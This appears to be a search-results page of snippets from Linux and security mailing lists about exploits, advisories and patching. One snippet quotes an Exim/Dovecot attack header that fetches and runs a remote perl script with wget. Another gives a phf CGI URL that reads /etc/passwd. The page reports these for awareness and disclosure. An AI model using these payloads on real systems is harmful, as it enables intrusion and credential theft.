search for: exploit

With companies like Facebook and Google offering cash prizes for people who can find security holes in their products, has there ever been any consideration given to offering cash rewards to people finding security exploits in CentOS or in commonly bundled services like Apache? (Provided of course they follow "responsible disclosure" and report the exploit to the software authors and get it fixed.) Obviously the benefit would be that it would increase the chance of a white hat finding and fixing an exp...

////usr/lib/kde3/kfile_ps.so: Exploit.Linux.Gv FOUND ////usr/lib/kde3/gsthumbnail.so: Exploit.Linux.Gv FOUND ////usr/lib/libgs.so.7.07: Exploit.Linux.Gv FOUND ////usr/lib/libkghostviewlib.so.0.0.0: Exploit.Linux.Gv FOUND I start the procmail process and a mail with those lines appears on my inbox (with subject "Virus found")...

...source. It is highly unlikely that the NSA, or any other agency, would risk putting in backdoors to code that could be audited by Joe "random hacker" Blogs, let alone that might be discovered by hostile agencies. There is no doubt that most security agencies have a long list of zero- day exploits in their toolbox - I would hazard to suggest that they wouldn't be doing their job if they didn't! But I seriously doubt they would commission exploitable code in something that is openly auditable. P.

...ot subscribed to any security alert mailing lists which send out announcements like "Please disable this feature as a workaround until this hole is plugged", so the machine just hums along with all of its default settings. So the machine can still be broken into, if there is an unpatched exploit released in the wild, in the window of time before a patch is released for that update. On the other hand, at any point in time where there are no unpatched exploits in the wild, the machine should be much harder to break into. Roughly what percent of the time is there such an unpatched exploit i...

I saw that there is a local root exploit in the wild. http://blog.kagesenshi.org/2008/02/local-root-exploit-on-wild.html And I see my centos box still has: 2.6.18-53.1.4.el5 yum says there are no updates... am I safe? Valent.

On Thu, 2017-02-02 at 13:40 -0800, Gordon Messmer wrote: > Escalation *requires* attacking a program in a security context other > than your own. Not necessarily. Suppose the adversary is aware of a root exploit/privilege escalation in a random library. Then the heap spraying allows this attacker to easily trigger this exploit because he is able to initialize the entire contents of the heap to his liking and thus call whatever function he likes, including the one that will cause the root exploit. So even...

One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is usi...

As is my routine every couple of weeks, I ran Pest Patrol anti-spyware software, and was disturbed to find it came back saying that the file FLAC/COPYING.FDL was a security exploit known as "Virus Tutorial" or VTool/jul2. This has left me wondering if FLAC is to be trusted. Here's what PestPatrol's web site has to say about it: Exploit: A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it. Exploits a...

Some time ago one of my customer's computers was compromised by outside attackers, and though we were able to clean it up I never learned how. A few weeks back, my own office machine was hacked and the signs were similar; but this time I found an exploit program named "kulak" in my /tmp directory. Evidently (according to the source, which the attacker left behind also) kulak exploits a buffer overflow in Samba 2.2.8 to get a root shell. I searched Google to no avail for this exploit; so I am asking here. Is this bug fixed in later...

https://bugzilla.redhat.com/show_bug.cgi?id=432251 Mentioned on Slashdot here: http://it.slashdot.org/article.pl?sid=08/02/10/2011257 Fedora bug report here: https://bugzilla.redhat.com/show_bug.cgi?id=432229 -- MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com

Is it possible to use this exploit against a kvm guest to read memory used by the host? In other words: if an exploitable service, say httpd with mod_ssl, is running in guest system 'vm1' hosted on system 'virthost' then what implications does that have with respect to guests vm2 and vm3 and to virthost itself? --...

Is it possible to use this exploit against a kvm guest to read memory used by the host? In other words: if an exploitable service, say httpd with mod_ssl, is running in guest system 'vm1' hosted on system 'virthost' then what implications does that have with respect to guests vm2 and vm3 and to virthost itself? --...

It has come to my attention that there are quite a few local exploits circling around in the private sector for GID Games. Several of the games have vanilla stack overflows in them which can lead to elevation of privileges if successfully exploited.

...] link bug" is a vunerability, which allows user X to overwrite files owned by Y (with useless portion of junk) when Y launchs buggy program. But this trivial (and often ignored) attack method can be easily turned into a cute, powerful weapon. Here''s an example how to perform advanced exploitation of gcc symlink bug (I choosen that one, because this problem is probably well-known and it''s pretty easy to fix). Original exploit code has been posted here about 1 month ago... ADVANCED "symlink" ATTACK First of all, we need to fix our exploit by replacing symlink with na...

...trator in one of the student clubs here. We run about 10 computers with one server. Mainly linux and all run openssh. We have closed telnet so only ssh-connections is allowed. Last night i got a mail from one of the system adminstrators at G?teborgs university saying that there was a possible root exploit in all openssh versions from 2.9.9p2 and below. Shortly after this the universty closed all connections using port 22 (that is how serious they think it is) effectivly making all the machines I am responsible for unable to log on to from the outside. They have looked at the exploit and i'll tr...

BM_207650 MEDIUM Vulnerability Version: 1 2/18/2004@03:47:29 GMT Initial report <https://ialert.idefense.com/KODetails.jhtml?irId=207650> ID#207650: FreeBSD Memory Buffer Exhaustion Denial of Service Vulnerability (iDEFENSE Exclusive): Remote exploitation of a denial of service (DoS) vulnerability in FreeBSD's memory buffers (mbufs) could allow attackers to launch a DoS attack. By sending many out-of-sequence packets, a low bandwidth denial of service attack is possible against FreeBSD. When the targeted system runs out of memory buffers (...

...but can still be escaped using 0xFF. It takes vulnerabilites in both phf and bash for it to work. I have tested this very successfully on many linux machines. I would imagine that most people are aware of the 0x0A escape and so when they test it on their own box they think they are safe from phf exploitation. The syntax for the exploit is almost identical to the older phf exploit. To execute commands: (cat /etc/passwd) http://server.net/cgi-bin/phf?Qalias=%ffcat%20/etc/passwd I know this exploit isn''t only confided to linux, but it seems its easiest to exploit on linux. If everybody i...

Hello, Anyone have information on whether RedHat-5.0+ is affected by the recent (today's) CERT advisory regarding QPOP? thanks, -bp -- B. James Phillippe <bryan@terran.org> Linux Software Engineer, WGT Inc. http://earth.terran.org/~bryan

Package: xen-hypervisor-3.2-1-i386 Version: 3.2-1 Severity: critical Tags: security Justification: DoS of entire system regardless of privilege When running the exploit listed in bug 464953 [1], Xen's memory state becomes corrupted and the hypervisor eventually crashes, taking all of the domU's with it. As such, this breaks operational behaviour, so I have marked this as critical. [1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953 -- System Info...

This was just posted on the Postfix list. Centos 7 ships with: postfix-2.10.1-6.el7 Has this cert advisory been applied to the Centos build of Postfix? thank you -------- Forwarded Message -------- Subject: Obsolete NSA exploit for Postfix 2.0 - 2.2 Date: Sun, 9 Apr 2017 16:18:06 -0400 (EDT) From: Wietse Venema <wietse at porcupine.org> To: Postfix users <postfix-users at postfix.org> CC: Postfix announce <postfix-announce at postfix.org> A recent twitter post reveals the existence of an exploit f...